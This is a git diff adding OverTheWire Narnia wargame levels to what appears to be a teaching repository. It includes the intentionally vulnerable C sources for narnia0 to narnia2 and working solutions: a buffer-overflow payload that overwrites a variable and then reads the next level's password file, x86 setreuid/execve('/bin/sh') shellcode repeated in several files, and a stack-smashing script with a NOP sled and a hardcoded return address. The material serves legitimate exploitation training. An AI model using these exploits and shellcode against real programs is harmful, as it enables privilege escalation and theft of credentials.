diff --git a/presentations/4. OTW Narnia/OTW_Narnia.odp b/presentations/4. OTW Narnia/OTW_Narnia.odp
new file mode 100644
index 0000000..18361ba
Binary files /dev/null and b/presentations/4. OTW Narnia/OTW_Narnia.odp differ
diff --git a/presentations/4. OTW Narnia/OTW_Narnia.pdf b/presentations/4. OTW Narnia/OTW_Narnia.pdf
new file mode 100644
index 0000000..613e8a0
Binary files /dev/null and b/presentations/4. OTW Narnia/OTW_Narnia.pdf differ
diff --git a/tasks/pwn/narnia/narnia0/narnia0.c b/tasks/pwn/narnia/narnia0/narnia0.c
new file mode 100644
index 0000000..f7aeb79
--- /dev/null
+++ b/tasks/pwn/narnia/narnia0/narnia0.c
@@ -0,0 +1,40 @@
+/*
+   This program is free software; you can redistribute it and/or modify
+   it under the terms of the GNU General Public License as published by
+   the Free Software Foundation; either version 2 of the License, or
+   (at your option) any later version.
+
+   This program is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+   GNU General Public License for more details.
+
+   You should have received a copy of the GNU General Public License
+   along with this program; if not, write to the Free Software
+   Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+   */
+#include <stdio.h>
+#include <stdlib.h>
+
+int main(){
+    long val=0x41414141;
+    char buf[20];
+
+    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
+    printf("Here is your chance: ");
+    scanf("%24s",&buf);
+
+    printf("buf: %s\n",buf);
+    printf("val: 0x%08x\n",val);
+
+    if(val==0xdeadbeef){
+        setreuid(geteuid(),geteuid());
+        system("/bin/sh");
+    }
+    else {
+        printf("WAY OFF!!!!\n");
+        exit(1);
+    }
+
+    return 0;
+}
diff --git a/tasks/pwn/narnia/narnia0/narnia0_exploit.py b/tasks/pwn/narnia/narnia0/narnia0_exploit.py
new file mode 100644
index 0000000..92f7c52
--- /dev/null
+++ b/tasks/pwn/narnia/narnia0/narnia0_exploit.py
@@ -0,0 +1,13 @@
+#!/bin/python3
+import time
+import sys
+
+# exploit buffer overflow
+sys.stdout.buffer.write(b"\x90" * 20 + b"\xef\xbe\xad\xde")
+
+# sync script stdout to narnia0 stdin and wait some time
+sys.stdout.flush()
+time.sleep(1)
+
+# command to get our next password
+sys.stdout.buffer.write(b"cat /etc/narnia_pass/narnia1")
diff --git a/tasks/pwn/narnia/narnia1/export_egg.py b/tasks/pwn/narnia/narnia1/export_egg.py
new file mode 100644
index 0000000..2e8c80d
--- /dev/null
+++ b/tasks/pwn/narnia/narnia1/export_egg.py
@@ -0,0 +1,3 @@
+#!/bin/python3
+import sys
+sys.stdout.buffer.write(b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80")
diff --git a/tasks/pwn/narnia/narnia1/narnia1.c b/tasks/pwn/narnia/narnia1/narnia1.c
new file mode 100644
index 0000000..863f5cb
--- /dev/null
+++ b/tasks/pwn/narnia/narnia1/narnia1.c
@@ -0,0 +1,31 @@
+/*
+   This program is free software; you can redistribute it and/or modify
+   it under the terms of the GNU General Public License as published by
+   the Free Software Foundation; either version 2 of the License, or
+   (at your option) any later version.
+
+   This program is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+   GNU General Public License for more details.
+
+   You should have received a copy of the GNU General Public License
+   along with this program; if not, write to the Free Software
+   Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+   */
+#include <stdio.h>
+
+int main(){
+    int (*ret)();
+
+    if(getenv("EGG")==NULL){
+        printf("Give me something to execute at the env-variable EGG\n");
+        exit(1);
+    }
+
+    printf("Trying to execute EGG!\n");
+    ret = getenv("EGG");
+    ret();
+
+    return 0;
+}
diff --git a/tasks/pwn/narnia/narnia1/shellcode b/tasks/pwn/narnia/narnia1/shellcode
new file mode 100644
index 0000000..763878a
--- /dev/null
+++ b/tasks/pwn/narnia/narnia1/shellcode
@@ -0,0 +1,5 @@
+\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80
+
+len: 34
+
+export SHELLCODE=$(python3 -c 'import sys;sys.stdout.buffer.write(b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80")')
diff --git a/tasks/pwn/narnia/narnia1/shellcode.c b/tasks/pwn/narnia/narnia1/shellcode.c
new file mode 100644
index 0000000..d3b7084
--- /dev/null
+++ b/tasks/pwn/narnia/narnia1/shellcode.c
@@ -0,0 +1,36 @@
+/*
+ * (Linux/x86) setreuid(0,0) + execve("/bin/sh", ["/bin/sh", NULL])
+ * - 33 bytes
+ * - xgc@gotfault.net
+ *
+ */
+
+char shellcode[] =
+  // setreuid(0, 0)
+  "\x6a\x46"			// push   $0x46
+  "\x58"			    // pop    %eax
+  "\x31\xdb"			// xor	  %ebx, %ebx
+  "\x31\xc9"			// xor	  %ecx, %ecx
+  "\xcd\x80"			// int    $0x80
+
+  // execve("/bin/sh")
+  "\x31\xd2"			// xor    %edx, %edx
+  "\x6a\x0b"			// push   $0xb
+  "\x58"			    // pop    %eax
+  "\x52"			    // push   %edx
+  "\x68\x2f\x2f\x73\x68"// push   $0x68732f2f
+                        // [h, s, /, /]
+  "\x68\x2f\x62\x69\x6e"// push   $0x6e69622f
+                        // [n, i, b, /]
+  "\x89\xe3"			// mov    %esp, %ebx
+  "\x52"			    // push   %edx
+  "\x53"			    // push   %ebx
+  "\x89\xe1"			// mov    %esp, %ecx
+  "\xcd\x80";			// int    $0x80
+ 
+int main() {
+ 
+        int (*f)() = (int(*)())shellcode;
+        printf("Length: %u\n", strlen(shellcode));
+        f();
+}
diff --git a/tasks/pwn/narnia/narnia2/esp.c b/tasks/pwn/narnia/narnia2/esp.c
new file mode 100644
index 0000000..7a46285
--- /dev/null
+++ b/tasks/pwn/narnia/narnia2/esp.c
@@ -0,0 +1,6 @@
+#include <string.h>
+#include <stdio.h>
+void main(int argc, char *argv[]) {
+        register int i asm("esp");
+        printf("$esp = %#010x\n", i);
+}
diff --git a/tasks/pwn/narnia/narnia2/narnia2.c b/tasks/pwn/narnia/narnia2/narnia2.c
new file mode 100644
index 0000000..45ab0f6
--- /dev/null
+++ b/tasks/pwn/narnia/narnia2/narnia2.c
@@ -0,0 +1,33 @@
+/*
+   This program is free software; you can redistribute it and/or modify
+   it under the terms of the GNU General Public License as published by
+   the Free Software Foundation; either version 2 of the License, or
+   (at your option) any later version.
+
+   This program is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+   GNU General Public License for more details.
+
+   You should have received a copy of the GNU General Public License
+   along with this program; if not, write to the Free Software
+   Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+*/
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+int main(int argc, char * argv[]){
+    char buf[128];
+
+    if(argc == 1){
+        printf("Usage: %s argument\n", argv[0]);
+        exit(1);
+    }
+    strcpy(buf,argv[1]);
+    printf("%s", buf);
+
+    return 0;
+}
+
diff --git a/tasks/pwn/narnia/narnia2/shellcode.py b/tasks/pwn/narnia/narnia2/shellcode.py
new file mode 100644
index 0000000..4ecbb53
--- /dev/null
+++ b/tasks/pwn/narnia/narnia2/shellcode.py
@@ -0,0 +1,9 @@
+#!/bin/python3
+import sys
+shellcode=b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"
+# -112 for real world
+# address=b"\x18\xd4\xff\xff"
+address=b"\xa8\xd3\xff\xff"
+
+sys.stdout.buffer.write(shellcode)
+sys.stdout.buffer.write((132-len(shellcode)) * b"\x90" + address)